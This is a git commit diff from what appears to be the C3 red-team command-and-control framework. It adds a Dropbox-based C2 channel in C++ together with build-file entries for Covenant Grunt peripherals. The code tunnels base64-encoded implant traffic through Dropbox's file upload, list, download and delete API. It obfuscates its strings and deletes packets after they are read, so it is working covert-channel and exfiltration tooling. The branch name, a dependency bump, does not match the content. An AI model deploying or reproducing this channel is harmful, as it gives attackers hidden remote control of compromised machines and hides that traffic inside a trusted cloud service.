DropBox Channel

dependabot/npm_and_yarn/Src/WebController/UI/elliptic-6.5.3
AdminPanda 2020-05-18 19:04:06 -04:00
parent 90feca454e
commit a2967d739e
4 changed files with 277 additions and 287 deletions

View File

@ -14,6 +14,7 @@
<ProjectCapability Include="SourceItemsFromImports" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\Slack.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\UncShareFile.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\MockServer.cpp" />
@ -49,6 +50,7 @@
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base32_default_crockford.hpp" />
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base64_default_rfc4648.hpp" />
<ClInclude Include="$(MSBuildThisFileDirectory)CppRestSdk\include\cpprest\http_client.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteArray.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteConverter.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\CppTools\ByteConverter\ByteVector.h" />

View File

@ -22,6 +22,11 @@
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\WinTools\StructuredExceptionHandling.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\WinTools\InjectionBuffer.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\CppTools\Compression.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\MockServer.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Connectors\Covenant.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Mock.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Grunt.cpp" />
<ClCompile Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="$(MSBuildThisFileDirectory)CppCodec\base32_default_crockford.hpp" />
@ -95,5 +100,8 @@
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\HttpRequest.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\Uri.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\WinHttp\WebProxy.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Grunt.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Peripherals\Mock.h" />
<ClInclude Include="$(MSBuildThisFileDirectory)FSecure\C3\Interfaces\Channels\DropBox.h" />
</ItemGroup>
</Project>

View File

@ -1,8 +1,6 @@
#include "StdAfx.h"
#include <fstream>
#include <filesystem>
#include <Common/CppRestSdk/include/cpprest/http_client.h>
#include "Common/CppRestSdk/include/cpprest/http_client.h"
#include "Common/FSecure/Crypto/Base64.h"
#include "Common/CppRestSdk/include/cpprest/base_uri.h"
@ -19,19 +17,17 @@ namespace FSecure::C3::Interfaces::Channels
, m_Directory( arguments.Read<std::string>() )
, m_Token( arguments.Read<std::string>() )
{
//if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty())
// this->m_HttpConfig.set_proxy(winProxy == OBF(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
this->m_HttpConfig.set_proxy(web::web_proxy(L"http://192.168.0.18:8080"));
this->m_HttpConfig.set_validate_certificates(false);
if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty())
this->m_HttpConfig.set_proxy(winProxy == OBF(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy));
}
// Make a HTTP POST Request
std::string DropBox::SendHTTPRequest(std::string const& host, std::string const& contentType, std::string const& data)
{
while (true)
{
web::http::client::http_client webClient(utility::conversions::to_string_t(host), this->m_HttpConfig);
web::http::http_request request(web::http::methods::POST);
@ -56,12 +52,13 @@ namespace FSecure::C3::Interfaces::Channels
else if (resp.status_code() == web::http::status_codes::TooManyRequests)
std::this_thread::sleep_for(FSecure::Utils::GenerateRandomValue(10s, 20s));
else if (resp.status_code() == web::http::status_code(409))
{ }
return "{}";
else
throw std::exception(OBF("[x] Non 200/429 HTTP Response\n"));
throw std::exception(OBF("[x] Non 200/409/429 HTTP Response\n"));
}
}
// Make a HTTP POST Request and also edit the Headers.
std::string DropBox::SendHTTPRequest(std::string const& host, json const& h_args, std::string const& contentType, std::string const& data)
{
while (true)
@ -87,26 +84,32 @@ namespace FSecure::C3::Interfaces::Channels
web::http::http_response resp = webClient.request(request).get();
if (resp.status_code() == web::http::status_codes::OK)
return resp.extract_utf8string(true).get();
{
resp.headers().set_content_type(L"text/plain");
return resp.extract_utf8string().get();
}
else if (resp.status_code() == web::http::status_codes::TooManyRequests)
std::this_thread::sleep_for(FSecure::Utils::GenerateRandomValue(10s, 20s));
else if (resp.status_code() == web::http::status_code(409))
{ }
return "{}";
else
throw std::exception(OBF("[x] Non 200/429 HTTP Response\n"));
throw std::exception(OBF("[x] Non 200/409/429 HTTP Response\n"));
}
}
// Parse HTTP POST Response as JSON
json DropBox::SendJsonRequest(std::string const& url, json const& data)
{
return json::parse(SendHTTPRequest(url, OBF("application/json"), data.dump()));
}
// Parse HTTP POST(with edited headers) Respose as JSON
json DropBox::SendJsonRequest(std::string const& url, json const& h_args, std::string data)
{
return json::parse(SendHTTPRequest(url, h_args, OBF("application/octet-stream"), data));
}
// Send Packets to Channel
size_t DropBox::OnSendToChannel(FSecure::ByteView packet)
{
@ -122,15 +125,14 @@ namespace FSecure::C3::Interfaces::Channels
{
std::string base64 = cppcodec::base64_rfc4648::encode(packet.data(), packet.size());
//Write to file on DropBox
std::string url = OBF_STR("https://content.dropboxapi.com/2/files/upload");
json db_args;
db_args[OBF("path")] = OBF("/") + m_Directory + OBF("/") + m_outFile;
db_args[OBF("path")] = OBF("/") + m_Directory + m_outFile + "/" + m_outFile + std::to_string(FSecure::Utils::GenerateRandomValue<int>(10000, 99999));
db_args[OBF("mode")] = OBF("add");
db_args[OBF("autorename")] = true;
db_args[OBF("mute")] = true;
SendJsonRequest(url, db_args, base64);
SendJsonRequest(OBF_STR("https://content.dropboxapi.com/2/files/upload"), db_args, base64);
bytesWritten = packet.length();
}
// if total packet size is larger than api file upload size
@ -142,78 +144,55 @@ namespace FSecure::C3::Interfaces::Channels
b64packet = cppcodec::base64_rfc4648::encode(strpacket.data(), strpacket.size());
std::string url = OBF_STR("https://content.dropboxapi.com/2/files/upload");
json db_args;
db_args[OBF("path")] = OBF("/") + m_Directory + OBF("/") + m_outFile;
db_args[OBF("path")] = OBF("/") + m_Directory + m_outFile + "/" + m_outFile + std::to_string(FSecure::Utils::GenerateRandomValue<int>(10000, 99999));
db_args[OBF("mode")] = OBF("add");
db_args[OBF("autorename")] = true;
db_args[OBF("mute")] = true;
SendJsonRequest(url, db_args, b64packet);
SendJsonRequest(OBF_STR("https://content.dropboxapi.com/2/files/upload"), db_args, b64packet);
bytesWritten = strpacket.size();
}
return bytesWritten;
}
std::vector<FSecure::ByteVector> DropBox::OnReceiveFromChannel()
// Read Packets from Channel
FSecure::ByteVector DropBox::OnReceiveFromChannel()
{
std::vector<ByteVector> ret;
bool loop_again = false;
//list all files on DropBox
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/list_folder");
FSecure::ByteVector packet;
// Check if there are packets to read
json db_list;
db_list[OBF("path")] = OBF("/") + m_Directory;
db_list[OBF("path")] = OBF("/") + m_Directory + m_inFile;
db_list[OBF("recursive")] = false;
db_list[OBF("limit")] = 1;
json filelist = SendJsonRequest(url, db_list);
std::cout << "No of files to read : " << filelist["entries"].size() << std::endl;
do
{
if (filelist["entries"].size() > 0)
json filelist = SendJsonRequest(OBF_STR("https://api.dropboxapi.com/2/files/list_folder"), db_list);
if (filelist["entries"][0].size())
{
for (int i = 0; i < filelist["entries"].size(); i++)
{
url = OBF_STR("https://content.dropboxapi.com/2/files/download");
// Download packet from DropBox
json db_args;
db_args[OBF("path")] = filelist["entries"][i]["path_display"];
std::cout << "Reading Files: " << filelist["entries"][i]["path_display"] << std::endl;
db_args[OBF("path")] = filelist["entries"][0]["path_display"];
std::string fileContent = SendHTTPRequest(OBF_STR("https://content.dropboxapi.com/2/files/download"), db_args, " text/plain; charset=utf-8", "");
std::string fileContent = SendHTTPRequest(url, db_args, " text/plain; charset=utf-8", "");
if (!fileContent.empty())
{
// read packet from file
auto relayContent = cppcodec::base64_rfc4648::decode(fileContent);
// Read packet from file
packet = cppcodec::base64_rfc4648::decode(fileContent);
//remove command from channel after completion
url = OBF_STR("https://api.dropboxapi.com/2/files/delete_v2");
// Remove packet from DropBox after read
SendJsonRequest(OBF_STR("https://api.dropboxapi.com/2/files/delete_v2"), db_args);
SendJsonRequest(url, db_args);
ret.emplace_back(std::move(relayContent));
}
}
}
// check if there are more files on dropbox
// if true, list more files
loop_again = filelist["has_more"];
if (loop_again)
{
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/list_folder/continue");
json db_list1;
db_list1[OBF("cursor")] = filelist["cursor"];
filelist = SendJsonRequest(url, db_list1);
}
} while (loop_again);
return ret;
}
return FSecure::ByteVector { packet };
}
// Custom Command
ByteVector DropBox::OnRunCommand(ByteView command)
{
auto commandCopy = command;
@ -227,6 +206,7 @@ namespace FSecure::C3::Interfaces::Channels
}
}
// Clear all files from DropBox
bool DropBox::Clear()
{
std::string url = OBF_STR("https://api.dropboxapi.com/2/files/delete_v2");

View File

@ -17,7 +17,7 @@ namespace FSecure::C3::Interfaces::Channels
/// Reads a single C3 packet from Channel. Periodically called by attached Relay. Implementation should read the data (or return an empty buffer if there's nothing in the Channel waiting to read) and leave as soon as possible.
/// @return ByteVector that contains a single packet retrieved from Channel.
std::vector<FSecure::ByteVector> OnReceiveFromChannel();
FSecure::ByteVector OnReceiveFromChannel();
/// Describes Channels creation parameters and custom Commands.